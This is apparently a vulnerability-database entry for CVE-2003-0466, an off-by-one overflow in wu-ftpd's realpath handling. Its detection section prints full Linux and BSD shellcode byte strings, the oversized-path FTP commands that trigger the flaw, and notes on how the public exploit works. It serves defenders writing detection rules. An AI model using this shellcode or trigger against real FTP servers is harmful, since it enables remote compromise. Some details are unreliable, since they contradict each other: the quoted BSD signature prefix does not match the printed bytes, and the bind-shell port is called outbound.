CVE-2003-0466
published 2003-08-27

Priority: P3 55 · Severity: critical · CVSS 3.1 base score: 9.8
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: public exploit known
EPSS: 78.11% (99.5th percentile)
Off-by-one error in the fb_realpath() function, as derived from the realpath function in BSD, may allow attackers to execute arbitrary code, as demonstrated in wu-ftpd 2.5.0 through 2.6.2 via commands that cause pathnames of length MAXPATHLEN+1 to trigger a buffer overflow, including (1) STOR, (2) RETR, (3) APPE, (4) DELE, (5) MKD, (6) RMD, (7) STOU, or (8) RNTO.

Affected

8 ranges
Vendor     Product           Version range    Fixed in
apple      mac_os_x
apple      mac_os_x_server
freebsd    freebsd           4.0 – 5.0
netbsd     netbsd            1.5 – 1.6.1
openbsd    openbsd           2.0 – 3.3
redhat     wu_ftpd
sun        solaris
wuftpd     wu-ftpd           2.5.0 – 2.6.2

Detection & IOCs (extracted from sources)

command: STOR
command: MKD <MAXPATHLEN+1 length path>
command: MLST <oversized path buffer>
url: http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt
bytes (Linux shellcode signature):
\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31
bytes (BSD shellcode signature):
\xeb\x64\x5e\x31\xc0\x88\x46\x07\x6a\x06\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89\xc2\x31\xc0\xc6\x46\x09\x02\x66\xc7\x46\x0a\xa1\x26\x89\x46\x0c\x6a\x10\x8d\x46\x08\x50\x52\x31\xc0\xb0\x68\x50\xcd\x80\x6a\x01\x52\x31\xc0\xb0\x6a\x50\xcd\x80\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd\x80\xb1\x03\xbb\xff\xff\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01\x75\xf3\x31\xc0\x50\x50\x56\xb0\x3b\x50\xcd\x80\xe8\x97\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23
  • Detect FTP banner strings 'wu-2.6.0', 'wu-2.6.1', or 'wu-2.6.2' in the FTP 220 greeting — the exploit's own banner scanner checks for these exact strings to confirm a vulnerable target.
  • Alert on FTP commands (STOR, RETR, APPE, DELE, MKD, RMD, STOU, RNTO) carrying path arguments at or exceeding MAXPATHLEN+1 (typically 1025 bytes on BSD/Linux), which is the trigger condition for the off-by-one overflow.
  • Monitor for unexpected outbound TCP connections from the FTP server process to port 41254, which is the bind-shell port used by the FreeBSD-targeted shellcode payload.
  • Detect the Linux exploit shellcode NOP sled + payload byte sequence starting with \x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80 in FTP command payloads (setuid/chroot-break/execve shellcode by Lam3rZ).
  • Detect the BSD exploit shellcode byte sequence starting with \x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80 in FTP command payloads (Lam3rZ chroot() code rewritten for FreeBSD by venglin).
  • Flag FTP sessions where a large number of MKD commands are issued in rapid succession with incrementally varying long directory names — this is the exploit's directory-creation loop used to stage the overflow path.
  • Statically linked programs embedding their own realpath() copy are not fixed by patching the C library alone and require rebuilding against a patched libc.
  • The vulnerability affects wu-ftpd versions 2.5.0 through 2.6.2; the exploit targets 2.6.0, 2.6.1, and 2.6.2 with platform-specific return addresses for RedHat Linux 6.x, FreeBSD 4.6.2-RELEASE, and OpenBSD 3.0.
  • The exploit uses 0xff byte doubling in the attack buffer construction to avoid path-separator issues; IDS signatures must account for this encoding when matching shellcode in FTP command streams.

CVSS provenance

Source          Version   Score   Severity   Vector
nvd             v3.1      9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd             v2.0      10.0    CRITICAL   AV:N/AC:L/Au:N/C:C/I:C/A:C
vendor_redhat             9.8     CRITICAL